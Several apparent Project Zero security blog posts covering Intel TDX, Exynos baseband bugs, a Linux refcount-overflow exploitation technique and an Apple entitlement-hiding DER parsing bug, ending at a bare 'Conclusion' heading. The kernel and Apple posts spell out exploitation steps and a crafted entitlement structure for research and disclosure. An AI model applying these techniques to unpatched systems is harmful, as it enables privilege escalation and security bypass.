Today, members of Google Project Zero and Google Cloud are releasing a report on a security review of Intel's Trust Domain Extensions (TDX). TDX is a feature introduced to support Confidential Computing by providing hardware isolation of virtual machine guests at runtime. This isolation is achieved by securing sensitive resources, such as guest physical memory. This restricts what information is exposed to the hosting environment.
The security review was performed in cooperation with Intel engineers on pre-release source code for version 1.0 of the TDX feature. This code is the basis for the TDX implementation which will be shipping in limited SKUs of the 4th Generation Intel Xeon Scalable CPUs.
The result of the review was the discovery of 10 confirmed security vulnerabilities which were fixed before the final release of products with the TDX feature. The final report highlights the most interesting of these issues and provides an overview of the feature's architecture. 5 additional areas were identified for defense-in-depth changes to subsequent versions of TDX.
You can read more details about the review on the Google Cloud security blog and the final report. If you would like to review the source code yourself, Intel has made it available on the TDX website.
In late 2022 and early 2023, Project Zero reported eighteen 0-day vulnerabilities in Exynos Modems produced by Samsung Semiconductor. The four most severe of these eighteen vulnerabilities (CVE-2023-24033, CVE-2023-26496, CVE-2023-26497 and CVE-2023-26498) allowed for Internet-to-baseband remote code execution. Tests conducted by Project Zero confirm that those four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim's phone number. With limited additional research and development, we believe that skilled attackers would be able to quickly create an operational exploit to compromise affected devices silently and remotely.
The fourteen other related vulnerabilities (CVE-2023-26072, CVE-2023-26073, CVE-2023-26074, CVE-2023-26075, CVE-2023-26076 and nine other vulnerabilities that are yet to be assigned CVE-IDs) were not as severe, as they require either a malicious mobile network operator or an attacker with local access to the device.
Affected devices
Samsung Semiconductor's advisories provide the list of Exynos chipsets that are affected by these vulnerabilities. Based on information from public websites that map chipsets to devices, affected products likely include:
Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12 and A04 series;
Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series;
The Pixel 6 and Pixel 7 series of devices from Google; and
any vehicles that use the Exynos Auto T5123 chipset.
Patch timelines
We expect that patch timelines will vary per manufacturer (for example, affected Pixel devices have received a fix for all four of the severe Internet-to-baseband remote code execution vulnerabilities in the March 2023 security update). In the meantime, users with affected devices can protect themselves from the baseband remote code execution vulnerabilities mentioned in this post by turning off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings, although your ability to change this setting can be dependent on your carrier. As always, we encourage end users to update their devices as soon as possible, to ensure that they are running the latest builds that fix both disclosed and undisclosed security vulnerabilities.
Four vulnerabilities being withheld from disclosure
Under our standard disclosure policy, Project Zero discloses security vulnerabilities to the public a set time after reporting them to a software or hardware vendor. In some rare cases where we have assessed attackers would benefit significantly more than defenders if a vulnerability was disclosed, we have made an exception to our policy and delayed disclosure of that vulnerability.
Due to a very rare combination of level of access these vulnerabilities provide and the speed with which we believe a reliable operational exploit could be crafted, we have decided to make a policy exception to delay disclosure for the four vulnerabilities that allow for Internet-to-baseband remote code execution. We will continue our history of transparency by publicly sharing disclosure policy exceptions, and will add these issues to that list once they are all disclosed.
Related vulnerabilities not being withheld
Of the remaining fourteen vulnerabilities, we are disclosing four vulnerabilities (CVE-2023-26072, CVE-2023-26073, CVE-2023-26074 and CVE-2023-26075) that have exceeded Project Zero's standard 90-day deadline today. These issues have been publicly disclosed in our issue tracker, as they do not meet the high standard to be withheld from disclosure. The remaining ten vulnerabilities in this set have not yet hit their 90-day deadline, but will be publicly disclosed at that point if they are still unfixed.
Changelog
2023-03-21: Removed note at the top of the blog as patches are more widely available for the four severe vulnerabilities. Added additional context that some carriers can control the Wifi calling and VoLTE settings, overriding the ability for some users to change this setting.
2023-03-20: Google Pixel updated their March 2023 Security Bulletin to now show that all four Internet-to-baseband remote code execution vulnerabilities were fixed for Pixel 6 and Pixel 7 in the March 2023 update, not just one of the vulnerabilities, as originally stated.
2023-03-20: Samsung Semiconductor updated their advisories to include three new CVE-IDs, that correspond to the three other Internet-to-baseband remote code execution issues (CVE-2023-26496, CVE-2023-26497 and CVE-2023-26498). The blogpost text was updated to reflect these new CVE-IDs.
2023-03-17: Samsung Semiconductor updated their advisories to remove Exynos W920 as an affected chipset, so we have removed it from the "Affected devices" section.
2023-03-17: Samsung Mobile advised us that the A21s is the correct affected device, not the A21 as originally stated.
2023-03-17: Four of the fourteen less severe vulnerabilities hit their 90-day deadline at the time of publication, not five, as originally stated.
For a fair amount of time, null-deref bugs were a highly exploitable kernel bug class. Back when the kernel was able to access userland memory without restriction, and userland programs were still able to map the zero page, there were many easy techniques for exploiting null-deref bugs. However with the introduction of modern exploit mitigations such as SMEP and SMAP, as well as mmap_min_addr preventing unprivileged programs from mmap’ing low addresses, null-deref bugs are generally not considered a security issue in modern kernel versions. This blog post provides an exploit technique demonstrating that treating these bugs as universally innocuous often leads to faulty evaluations of their relevance to security.
Kernel oops overview
At present, when the Linux kernel triggers a null-deref from within a process context, it generates an oops, which is distinct from a kernel panic. A panic occurs when the kernel determines that there is no safe way to continue execution, and that therefore all execution must cease. However, the kernel does not stop all execution during an oops - instead the kernel tries to recover as best as it can and continue execution. In the case of a task, that involves throwing out the existing kernel stack and going directly to make_task_dead which calls do_exit. The kernel will also publish in dmesg a “crash” log and kernel backtrace depicting what state the kernel was in when the oops occurred. This may seem like an odd choice to make when memory corruption has clearly occurred - however the intention is to allow kernel bugs to more easily be detectable and loggable under the philosophy that a working system is much easier to debug than a dead one.
The unfortunate side effect of the oops recovery path is that the kernel is not able to perform any associated cleanup that it would normally perform on a typical syscall error recovery path. This means that any locks that were locked at the moment of the oops stay locked, any refcounts remain taken, any memory otherwise temporarily allocated remains allocated, etc. However, the process that generated the oops, its associated kernel stack, task struct and derivative members etc. can and often will be freed, meaning that depending on the precise circumstances of the oops, it’s possible that no memory is actually leaked. This becomes particularly important in regards to exploitation later.
Reference count mismanagement overview
Refcount mismanagement is a fairly well-known and exploitable issue. In the case where software improperly decrements a refcount, this can lead to a classic UAF primitive. The case where software improperly doesn’t decrement a refcount (leaking a reference) is also often exploitable. If the attacker can cause a refcount to be repeatedly improperly incremented, it is possible that given enough effort the refcount may overflow, at which point the software no longer has any remotely sensible idea of how many refcounts are taken on an object. In such a case, it is possible for an attacker to destroy the object by incrementing and decrementing the refcount back to zero after overflowing, while still holding reachable references to the associated memory. 32-bit refcounts are particularly vulnerable to this sort of overflow. It is important however, that each increment of the refcount allocates little or no physical memory. Even a single byte allocation is quite expensive if it must be performed 232 times.
Example null-deref bug
When a kernel oops unceremoniously ends a task, any refcounts that the task was holding remain held, even though all memory associated with the task may be freed when the task exits. Let’s look at an example - an otherwise unrelated bug I coincidentally discovered in the very recent past:
show_vma_header_prefix(m, priv->mm->mmap->vm_start,last_vma_end,0,0,0,0);//the deref of mmap causes a kernel oops here
seq_pad(m,' ');
seq_puts(m,"[rollup]\n");
__show_smap(m,&mss,true);
release_task_mempolicy(priv);
mmap_read_unlock(mm);
out_put_mm:
mmput(mm);
out_put_task:
put_task_struct(priv->task);
priv->task = NULL;
return ret;
}
This file is intended simply to print a set of memory usage statistics for the respective process. Regardless, this bug report reveals a classic and otherwise innocuous null-deref bug within this function. In the case of a task that has no VMA’s mapped at all, the task’s mm_struct mmap member will be equal to NULL. Thus the priv->mm->mmap->vm_start access causes a null dereference and consequently a kernel oops. This bug can be triggered by simply read’ing /proc/[pid]/smaps_rollup on a task with no VMA’s (which itself can be stably created via ptrace):
This kernel oops will mean that the following events occur:
The associated struct file will have a refcount leaked if fdget took a refcount (we’ll try and make sure this doesn’t happen later)
The associated seq_file within the struct file has a mutex that will forever be locked (any future reads/writes/lseeks etc. will hang forever).
The task struct associated with the smaps_rollup file will have a refcount leaked
The mm_struct’s mm_users refcount associated with the task will be leaked
The mm_struct’smmap lock will be permanently readlocked (any future write-lock attempts will hang forever)
Each of these conditions is an unintentional side-effect that leads to buggy behaviors, but not all of those behaviors are useful to an attacker. The permanent locking of events 2 and 5 only makes exploitation more difficult. Condition 1 is unexploitable because we cannot leak the struct file refcount again without taking a mutex that will never be unlocked. Condition 3 is unexploitable because a task struct uses a safe saturating kernel refcount_t which prevents the overflow condition. This leaves condition 4.
The mm_users refcount still uses an overflow-unsafe atomic_t and since we can take a readlock an indefinite number of times, the associated mmap_read_lock does not prevent us from incrementing the refcount again. There are a couple important roadblocks we need to avoid in order to repeatedly leak this refcount:
We cannot call this syscall from the task with the empty vma list itself - in other words, we can’t call read from /proc/self/smaps_rollup. Such a process cannot easily make repeated syscalls since it has no virtual memory mapped. We avoid this by reading smaps_rollup from another process.
We must re-open the smaps_rollup file every time because any future reads we perform on a smaps_rollup instance we already triggered the oops on will deadlock on the local seq_file mutex lock which is locked forever. We also need to destroy the resulting struct file (via close) after we generate the oops in order to prevent untenable memory usage.
If we access the mm through the same pid every time, we will run into the task structmax refcount before we overflow the mm_users refcount. Thus we need to create two separate tasks that share the same mm and balance the oopses we generate across both tasks so the task refcounts grow half as quickly as the mm_users refcount. We do this via the clone flag CLONE_VM
We must avoid opening/reading the smaps_rollup file from a task that has a shared file descriptor table, as otherwise a refcount will be leaked on the struct file itself. This isn’t difficult, just don’t read the file from a multi-threaded process.
Our final refcount leaking overflow strategy is as follows:
Process A forks a process B
Process B issues PTRACE_TRACEME so that when it segfaults upon return from munmap it won’t go away (but rather will enter tracing stop)
Proces B clones with CLONE_VM | CLONE_PTRACE another process C
Process B munmap’s its entire virtual memory address space - this also unmaps process C’s virtual memory address space.
Process A forks new children D and E which will access (B|C)’s smaps_rollup file respectively
(D|E) opens (B|C)’s smaps_rollup file and performs a read which will oops, causing (D|E) to die. mm_users will be refcount leaked/incremented once per oops
Process A goes back to step 5 ~232 times
The above strategy can be rearchitected to run in parallel (across processes not threads, because of roadblock 4) and improve performance. On server setups that print kernel logging to a serial console, generating 232 kernel oopses takes over 2 years. However on a vanilla Kali Linux box using a graphical interface, a demonstrative proof-of-concept takes only about 8 days to complete! At the completion of execution, the mm_users refcount will have overflowed and be set to zero, even though this mm is currently in use by multiple processes and can still be referenced via the proc filesystem.
Exploitation
Once the mm_users refcount has been set to zero, triggering undefined behavior and memory corruption should be fairly easy. By triggering an mmget and an mmput (which we can very easily do by opening the smaps_rollup file once more) we should be able to free the entire mm and cause a UAF condition:
staticinlinevoid __mmput(struct mm_struct *mm)
{
VM_BUG_ON(atomic_read(&mm->mm_users));
uprobe_clear_state(mm);
exit_aio(mm);
ksm_exit(mm);
khugepaged_exit(mm);
exit_mmap(mm);
mm_put_huge_zero_page(mm);
set_mm_exe_file(mm, NULL);
if(!list_empty(&mm->mmlist)){
spin_lock(&mmlist_lock);
list_del(&mm->mmlist);
spin_unlock(&mmlist_lock);
}
if(mm->binfmt)
module_put(mm->binfmt->module);
lru_gen_del_mm(mm);
mmdrop(mm);
}
Unfortunately, since 64591e8605 (“mm: protect free_pgtables with mmap_lock write lock in exit_mmap”), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm’smmap_lock is permanently readlocked many times, any calls to __mmput will manifest as a permanent deadlock inside of exit_mmap.
However, before the call permanently deadlocks, it will call several other functions:
uprobe_clear_state
exit_aio
ksm_exit
khugepaged_exit
Additionally, we can call __mmput on this mm from several tasks simultaneously by having each of them trigger an mmget/mmput on the mm, generating irregular race conditions. Under normal execution, it should not be possible to trigger multiple __mmput’s on the same mm (much less concurrent ones) as __mmput should only be called on the last and only refcount decrement which sets the refcount to zero. However, after the refcount overflow, all mmget/mmput’s on the still-referenced mm will trigger an __mmput. This is because each mmput that decrements the refcount to zero (despite the corresponding mmget being why the refcount was above zero in the first place) believes that it is solely responsible for freeing the associated mm.
This racy __mmput primitive extends to its callees as well. exit_aio is a good candidate for taking advantage of this:
While the callee function kill_ioctx is written in such a way to prevent concurrent execution from causing memory corruption (part of the contract of aio allows for kill_ioctx to be called in a concurrent way), exit_aio itself makes no such guarantees. Two concurrent calls of exit_aio on the same mmstruct can consequentlyinduce a double free of the mm->ioctx_table object, which is fetched at the beginning of the function, while only being freed at the very end. This race window can be widened substantially by creating many aio contexts in order to slow down exit_aio’s internal context freeing loop. Successful exploitation will trigger the following kernel BUG indicating that a double free has occurred:
Note that as this exit_aio path is hit from __mmput, triggering this race will produce at least two permanently deadlocked processes when those processes later try to take the mmap write lock. However, from an exploitation perspective, this is irrelevant as the memory corruption primitive has already occurred before the deadlock occurs. Exploiting the resultant primitive would probably involve racing a reclaiming allocation in between the two frees of the mm->ioctx_table object, then taking advantage of the resulting UAF condition of the reclaimed allocation. It is undoubtedly possible, although I didn’t take this all the way to a completed PoC.
Conclusion
While the null-dereference bug itself was fixed in October 2022, the more important fix was the introduction of an oops limit which causes the kernel to panic if too many oopses occur. While this patch is already upstream, it is important that distributed kernels also inherit this oops limit and backport it to LTS releases if we want to avoid treating such null-dereference bugs as full-fledged security issues in the future. Even in that best-case scenario, it is nevertheless highly beneficial for security researchers to carefully evaluate the side-effects of bugs discovered in the future that are similarly “harmless” and ensure that the abrupt halt of kernel code execution caused by a kernel oops does not lead to other security-relevant primitives.
Note: The vulnerability discussed here, CVE-2022-42855, was fixed in iOS 15.7.2 and macOS Monterey 12.6.2. While the vulnerability did not appear to be exploitable on iOS 16 and macOS Ventura, iOS 16.2 and macOS Ventura 13.1 nevertheless shipped hardening changes related to it.
Last year, I spent a lot of time researching the security of applications built on top of XMPP, an instant messaging protocol based on XML. More specifically, my research focused on how subtle quirks in XML parsing can be used to undermine the security of such applications. (If you are interested in learning more about that research, I did a talk on it at Black Hat USA 2022. The slides and the recording can be found here and here).
At some point, when a part of my research was published, people pointed out other examples (unrelated to XMPP) where quirks in XML parsing led to security vulnerabilities. One of those examples was a vulnerability dubbed Psychic Paper, a really neat vulnerability in the way Apple operating system checks what entitlements an application has.
Entitlements are one of the core security concepts of Apple’s operating systems. As Apple’s documentation explains, “An entitlement is a right or privilege that grants an executable particular capabilities.” For example, an application on an Apple operating system can’t debug another application without possessing proper entitlements, even if those two applications run as the same user. Even applications running as root can’t perform all actions (such as accessing some of the kernel APIs) without appropriate entitlements.
Psychic Paper was a vulnerability in the way entitlements were checked. Entitlements were stored inside the application’s signature blob in the XML format, so naturally the operating system needed to parse those at some point using an XML parser. The problem was that the OS didn’t have a single parser for this, but rather a staggering four parsers that were used in different places in the operating system. One parser was used for the initial check that the application only has permitted entitlements, and a different parser was later used when checking whether the application has an entitlement to perform a specific action.
When giving my talk on XMPP, I gave a challenge to the audience: Find me two different XML parsers that always, for every input, result in the same output. The reason why that is difficult is because XML, although intended to be a simple format, in reality is anything but simple. So it shouldn’t come as a surprise that a way was found for one of Apple's XML parsers to return one set of entitlements and another parser to see a different set of entitlements when parsing the same entitlements blob.
The fix for the Psychic Paper bug: originally, the problem occurred because Apple had four XML parsers in the OS, so, surprisingly, the fix was to add a fifth one.
So, after my XMPP research, when I learned about the Psychic Paper bug, I decided to take a look at these XML parsers and see if I can somehow find another way to trigger the bug even after the fix. After playing with various Apple XML parsers, I had an XML snippet I wanted to try out. However when I actually tried to use it in an application, I discovered that the system for checking entitlements behaved completely differently than I thought. This was because of…
DER Entitlements
According to Apple developer documentation, “Starting in iOS 15, iPadOS 15, tvOS 15, and watchOS 8, the system checks for a new, more secure signature format that uses Distinguished Encoding Rules, or DER, to embed entitlements into your app’s signature”. As another Apple article boldly proclaims, “The future is DER”.
So, what is DER?
Unlike the previous text-based XML format, DER is a binary format, also commonly used in digital certificates. The format is specified in the X.690 standard.
DER follows relatively simple type-length-data encoding rules. An image from the specification illustrates that:
The Identifier field encodes the object type, which can be a primitive (e.g. a string or a boolean), but also a constructed type (an object containing other objects, e.g. an array/sequence). The length field encodes the number of bytes in the content. Length can be encoded differently, depending on the length of content (e.g. if content is smaller than 128 bytes, then the length field only takes a single byte). Length field is followed by the content itself. In case of constructed types, the content is also encoded using the same encoding rules.
Each individual entitlement is a sequence which has two elements: a key and a value, e.g. “get-task-allow”:boolean(true). All entitlements are also a part of a constructed type (denoted as “cont [ 16 ]” in the listing).
DER is meant to have unique binary representation and replacing XML with DER was very likely motivated, at least in part, by preventing issues such as Psychic Paper. But does it necessarily succeed in that goal?
How entitlements are checked
To understand how entitlements are checked, it is useful to also look at the bigger picture and understand what security/integrity checks Apple operating systems perform on binaries before (and in some cases, while) running them.
Integrity information in Apple binaries is stored in a structure called the Embedded Signature Blob. This structure is a container for various other structures that play a role in integrity checking: The digital signature itself, but also entitlements and an important structure called the Code Directory. The Code Directory contains a hash of every page in the binary (up to the Signature Blob), but also other information, including the hash of the entitlements blob. The hash of the CodeDirectory is called cdHash and it is used to uniquely identify the binary. For example, it is cdHash that the digital signature actually signs. Since Code Directory contains a hash of the entitlements blob, note that any change to entitlements will lead to cdHash being different.
As also noted in the Psychic Paper writeup, there are several ways a binary might be signed:
The cdHash of the binary could be in the system’s Trust Cache, which stores the hashes of system binaries.
The binary could be signed by the Apple App Store.
The binary could be signed by the developer, but in that case it must reference a “Provisioning Profile” signed by Apple.
On macOS only, a binary could also be self-signed.
We are mostly interested in the last two cases, because they are the only ones that allow us to provide custom entitlements. However, in those cases, any entitlements a binary has must either be a subset of those allowed by the provisioning profile created by Apple (in the “provisioning profile” case) or entitlements must only contain those whitelisted by the OS (in the self-signed case). That is, unless one has a vulnerability like Psychic Paper.
An entrypoint into file integrity checks is the vnode_check_signature function inside the AppleMobileFileIntegrity kernel extension. AppleMobileFileIntegrity is the kernel component of integrity checking, but there is also the userspace demon: amfid which AppleMobileFileIntegrity uses to perform certain actions as noted further in the text.
We are not going to analyze the full behavior of vnode_check_signature. However, I will highlight the most important actions and those relevant to understanding DER entitlements workflow:
First, vnode_check_signature retrieves the entitlements in the DER format. If the currently loaded binary does not contain DER entitlements and only contains entitlements in the XML format, AppleMobileFileIntegrity calls transmuteEntitlementsInDaemon which uses amfid to convert entitlements from XML into DER format. The conversion itself is done via CFPropertyListCreateWithData (to convert XML to CFDictionary) and CESerializeCFDictionary (which converts CFDictionary to DER representation).
Checks on the signature are performed using the CoreTrust library by calling CTEvaluateAMFICodeSignatureCMS. This process has recently been documented in another vulnerability writeup and will not be examined in detail as it does not relate to entitlements directly.
Additional checks on the signature and entitlements are performed in amfid via the verify_code_directory function. This call will be analyzed in-depth later. One interesting detail about this interaction is that amfid receives the path to the executable as a parameter. In order to prevent race conditions where the file was changed between being loaded by kernel and checked by amfid, amfid returns the cdHash of the checked file. It is then verified that this cdHash matches the cdHash of the file in the kernel.
Provisioning profile information is retrieved and it is checked that the entitlements in the binary are a subset of the entitlements in the provisioning profile. This is done with the CEContextIsSubset function. This step does not appear to be present on macOS running on Intel CPUs, however even in that case, the entitlements are still checked in amfid as will be shown below.
The verify_code_directory function of amfid performs (among other things) the following actions:
Parses the binary and extracts all the relevant information for integrity checking. The code that does that is part of the open-source Security library and the two most relevant classes here are StaticCode and SecStaticCode. This code is also responsible for extracting the DER-encoded entitlements. Once again, if only XML-encoded entitlements are present, they get converted to DER format. This is, once again, done by the CFPropertyListCreateWithData and CESerializeCFDictionary pair of functions. Additionally, for later use, entitlements are also converted to CFDictionary representation. This conversion from DER to CFDictionary is done using the CEManagedContextFromCFData and CEQueryContextToCFDictionary function pair.
Checks that the signature signs the correct cdHash and checks the signature itself. The checking of the digital signature certificate chain isn’t actually done by the amfid process. amfidcalls into trustd for that.
On macOS, the entitlements contained in the binary are filtered into restricted and unrestricted ones. On macOS, the unrestricted entitlements are com.apple.application-identifier, com.apple.security.application-groups*, com.apple.private.signing-identifier and com.apple.security.*. If the binary contains any entitlements not listed above, it needs to be checked against a provisioning profile. The check here relies on the entitlements CFDictionary, extracted earlier in amfid.
Later, when the binary runs, if the operating system wants to check that the binary contains an entitlement to perform a specific action, it can do this in several ways. The “old way” of doing this is to retrieve a dictionary representation of entitlements and query a dictionary for a specific key. However, there is also a new API for querying entitlements, where the caller first creates a CEQuery object containing the entitlement key they want to query (and, optionally, the expected value) and then performs the query by calling CEContextQuery function with the CEQuery object as a parameter. For example, the IOTaskHasEntitlement function, which takes an entitlement name and returns bool relies on the latter API.
libCoreEntitlements
You might have noticed that a lot of functions for interacting with DER entitlements start with the letters “CE”, such as CEQueryContextToCFDictionary or CEContextQuery. Here, CE stands for libCoreEntitlements, which is a new library created specifically for DER-encoded entitlements. libCoreEntitlements is present both in the userspace (as libCoreEntitlements.dylib) and in the OS kernel (as a part of AppleMobileFileIntegrity kernel extension). So any vulnerability related to parsing the DER entitlement format would be located there.
“There are no vulnerabilities here”, I declared in one of the Project Zero team meetings. At the time, I based this claim on the following:
There is a single library for parsing DER entitlements, unlike the four/five used for XML entitlements. While there are two versions of the library, in userspace and kernel, those appear to be the same. Thus, there is no potential for parsing differential bugs like Psychic Paper. In addition to this, binary formats are much less susceptible to such issues in the first place.
The library is quite small. I both reviewed and fuzzed the library for memory corruption vulnerabilities and didn’t find anything.
It turns out I was completely wrong (as it often happens when someone declares code is bug free). But first…
Interlude: SHA1 Collisions
After my failure to find a good libCoreEntitlements bug, I turned to other ideas. One thing I noticed when digging into Apple integrity checks is that SHA1 is still supported as a valid hash type for Code Directory / cdHash. Since practical SHA1 collision attacks have been known for some time, I wanted to see if they can somehow be applied to break the entitlement check.
It should be noted that there are two kinds of SHA1 collision attacks:
Identical prefix attacks, where an attacker starts with a common file prefix and then constructs collision blocks such that SHA1(prefix + collision_blocks1) == SHA1(prefix + collision_blocks2).
Chosen prefix attacks, where the attacker starts with two different prefixes chosen by the attacker and constructs collision blocks such that SHA1(prefix1 + collision_blocks1) == SHA1(prefix2 + collision_blocks2).
While both attacks are currently practical against SHA1, the first type is significantly cheaper than the second one. According to SHA-1 is a Shambles paper from 2020, the authors report a “cost of US$ 11k for a (identical prefix) collision, and US$ 45k for a chosen-prefix collision”. So I wanted to see if an identical prefix attack on DER entitlements is possible. Special thanks to Ange Albertini for bringing me up to speed on the current state of SHA1 collision attacks.
My general idea was to
Construct two sets of entitlements that have the same SHA1 hash
Since entitlements will have the same SHA1 hash, the cdHash of the corresponding binaries will also be the same, as long as the corresponding Code Directories use SHA1 as the hash algorithm.
Exploit a race condition and switch the binary between being opened by the kernel and being opened by amfid
If everything goes well, amfid is going to see one set of entitlements and the kernel another set of entitlements, while believing that the binary hasn’t changed.
In order to construct an identical-prefix collision, my plan was to have an entitlements file that contains a long string. The string would declare a 16-bit size and the identical prefix would end right at the place where string length is stored. That way, when a collision is found, lengths of the string in two files would differ. Following the lengths would be more collision data (junk), but that would be considered string content and the parsing of the file would still succeed. Since the length of the string in two files would be different, parsing would continue from two different places in the two files. This idea is illustrated in the following image.
A (failed) idea for exploiting an identical prefix SHA1 collision against DER entitlements. The blue parts of the files are the same, while green and the red part represent (different) collision blocks.
Except it won’t work.
The reason it won’t work is that every object in DER, including an object that contains other objects, has a size. Once again, hat tip to Ange Albertini who pointed out right away that this is going to be a problem.
Since each individual entitlement is stored in a separate sequence object, with our collision we could change the length of a string inside the sequence object (e.g. a value of some entitlement), but not change the length of the sequence object itself. Having a mismatch between the sequence length and the length of content inside the sequence could, depending on how the parser is implemented, lead to a parsing failure. Alternatively, if the parser was more permissive, the parser would succeed but would continue parsing after the end of the current sequence, so the collision wouldn’t cause different entitlements to be seen in two different files.
Unless the sequence length is completely ignored.
So I took another look at the library, specifically at how sequence length was handled in different parts of the library, and that is when I found the actual bug.
The actual bug
libCoreEntitlements does not implement traversing DER entitlements in a single place. Instead, traversing is implemented in (at least) three different places:
Inside recursivelyValidateEntitlements, called from CEValidate which is used to validate entitlements before being loaded (e.g. CEValidate is called from CEManagedContextFromCFData which was mentioned before). Among other things, CEValidate ensures that entitlements are in alphabetical order and there are no duplicate entitlements.
der_vm_iterate, which is used when converting entitlements to dictionary (CEQueryContextToCFDictionary), but also from CEContextIsSubset.
der_vm_execute_nocopy, which is used when querying entitlements using CEContextQuery API.
The actual bug is that these traversal algorithms behave slightly differently, in particular in how they handle entitlement sequence length. der_vm_iterate behaved correctly and, after processing a single key/value sequence, continued processing after the sequence end (as indicated by the sequence length). recursivelyValidateEntitlements and der_vm_execute_nocopy however completely ignore the sequence length (beyond an initial check that it is within bounds of the entitlements blob) and, after processing a single entitlement (key/value sequence), would continue processing after the end of the value. This difference in iterating over entitlements is illustrated in the following image.
Illustration of how different algorithms within libCoreEntitlements traverse the same DER structure. der_vm_iterate is shown as green arrowson the left while der_vm_execute is shown as red arrows on the right. The red parts of the file represent a “hidden” entitlement that is only visible to the second algorithm.
This allowed hiding entitlements by embedding them as children of other entitlements, as shown below. Such entitlements would then be visible to CEValidate and CEContextQuery, but hidden from CEQueryContextToCFDictionary and CEContextIsSubset.
SEQUENCE
UTF8STRING :application-identifier
UTF8STRING :testapp
SEQUENCE
UTF8STRING :com.apple.private.foo
UTF8STRING :bar
SEQUENCE
UTF8STRING :get-task-allow
BOOLEAN :255
Luckily (for an attacker), the functions used to perform the check that all entitlements in the binary are a subset of those in the provisioning profile wouldn’t see these hidden entitlements, which would only surface when the kernel would query for a presence of a specific entitlement using the CEContextQuery API.
Since CEValidate would also see the “hidden” entitlements, these would need to be in alphabetical order together with “normal” entitlements. However, because generally allowed entitlements such as application-identifier on iOS and com.apple.application-identifier on macOS appear pretty soon in the alphabetical order, this requirement doesn’t pose an obstacle for exploitation.
Exploitation
In order to try to exploit these issues, some tooling was required. Firstly, tooling to create crafted entitlements DER. For this, I created a small utility called createder.cpp which can be used for example as
where entitlements.der is the output DER encoded entitlements file, entitlements before “--” are “normal” entitlements and those after “--” are hidden.
Next, I needed a way to embed such crafted entitlements into a signature blob. Normally, for signing binaries, Apple’s codesign utility is used. However, this utility only accepts XML entitlements as input and the user can’t provide a DER blob. At some point, codesign converts the user-provided XML to DER and embeds both in the resulting binary.
I decided the easiest way to embed custom DER in a binary would be to modify codesign behavior, specifically the XML to DER conversion process. To do this, I used TinyInst, a dynamic instrumentation library I developed together with contributors. TinyInst currently supports macOS and Windows.
In order to embed custom DER, I hooked two functions from libCoreEntitlements that are used during XML to DER conversion: CESizeSerialization and CESerialize (CESerializeWithOptions on macOS 13 / iOS 16). The first one computes the size of DER while the second one outputs DER bytes.
Initially, I wrote these hooks using TinyInst’s general-purpose low-level instrumentation API. However, since this process was more cumbersome than necessary, in the meantime I created an API specifically for function hooking. So instead of linking to my initial implementation that I sent with the bug report to Apple, let me instead show how the hooks would be implemented using the new TinyInst Hook API:
HookReplace (base class for our 2 hooks) is a helper class used to completely replace the function implementation with the hook. CESizeSerializationHook::OnFunctionEntered() and CESerializeWithOptionsHook::OnFunctionEntered() are the bodies of the hooks. Additional code is needed to read the replacement entitlement DER and also to retrieve the value of kCENoError, which is a value libCoreEntitlements functions return on success and that we must return from our hooked versions. Note that, on macOS Monterey, CESerializeWithOptions should be replaced with CESerialize and the 3rd argument will be the output address rather than 4th.
So, with that in place, I could sign a binary using DER provided in the entitlements.der file.
Now, with the tooling in place, the question becomes, how to exploit it. Or rather, which entitlement to target. In order to exploit the issue, we need to find an entitlement check that is ultimately made using CEContextQuery API. Unfortunately, that rules out most userspace daemons - all the ones I looked at still did entitlement checking the “old way”, by first obtaining a dictionary representation of entitlements. That leaves “just” the entitlement checks done by the OS kernel.
Fortunately, a lot of checks in the kernel are made using the vulnerable API. Some of these checks are done by AppleMobileFileIntegrity itself using functions like OSEntitlements::queryEntitlementsFor, AppleMobileFileIntegrity::AMFIEntitlementGetBool or proc_has_entitlement. But there are other APIs as well. For example, the IOTaskHasEntitlement and IOCurrentTaskHasEntitlement functions that are used from over a hundred places in the kernel (according to macOS Monterey kernel cache) end up calling CEContextQuery (by first calling amfi->OSEntitlements_query()).
One other potentially vulnerable API was IOUserClient::copyClientEntitlement, but only on Apple silicon, where pmap_cs_enabled() is true. Although I didn’t test this, there is some indication that in that case the CEContextQuery API or something similar to it is used. IOUserClient::copyClientEntitlement is most notably used by device drivers to check entitlements.
I attempted to exploit the issue on both macOS and iOS. On macOS, I found places where such an entitlement bypass could be used to unlock previously unreachable attack surfaces, but nothing that would immediately provide a stand-alone exploit. In the end, to report something while looking for a better primitive, I reported that I was able to invoke functionality of the kext_request API (kernel extension API) that I normally shouldn’t be able to do, even as the root user. At the time, I did my testing on macOS Monterey, versions 12.6 and 12.6.1.
On iOS, exploiting such an issue would potentially be more interesting, as it could be used as part of a jailbreak. I was experimenting with iOS 16.1 and nothing I tried seemed to work, but due to the lack of introspection on the iOS platform I couldn’t figure out why at the time.
That is, until I received a reply from Apple on my macOS report, asking me if I can reproduce on macOS Ventura. macOS Ventura was just released in the same week when I sent my report to Apple and I was hesitant to upgrade to a new major version while having a working setup on macOS Monterey. But indeed, when I upgraded to Ventura, and after making sure my tooling still works, the DER issue wouldn’t reproduce anymore. This was likely also the reason all of my iOS experiments were unsuccessful: iOS 16 shares the codebase with macOS Ventura.
It appears that the issue was fixed due to refactoring and not as a security issue (macOS Monterey would be updated in this case as well as Apple releases some security patches not just for the latest major version of macOS, but also for the two previous ones). Looking at the code, it appears the API libCoreEntitlements uses to do low-level DER parsing has changed somewhat - on macOS Monterey, libCoreEntitlements used mostly ccder_decode* functions to interact with DER, while on macOS ventura ccder_blob_decode* functions are used more often. The latter additionally take the parent DER structure as input and thus make processing of hierarchical DER structure somewhat less error-prone. As a consequence of this change, der_vm_execute_nocopy continues processing the next key/value sequence after the end of the current one (which is the intended behavior) and not, as before, after the end of the value object. At this point, since I could no longer reproduce the issue on the latest OS release, I was no longer motivated to write the exploit and stopped my efforts in order to focus on other projects.
Apple addressed the issue as CVE-2022-42855 on December 13, 2022. While Apple applied the CVE to all supported versions of their operating systems, including macOS Ventura and iOS 16, on those latest OS versions the patch seems to serve as an additional validation step. Specifically, on macOS Ventura, the patch is applied to function der_decode_key_value and makes sure that the key/value sequence does not contain other elements besides just key and the value (in other words, it makes sure that the length of the sequence matches length of key + value objects).
Conclusion
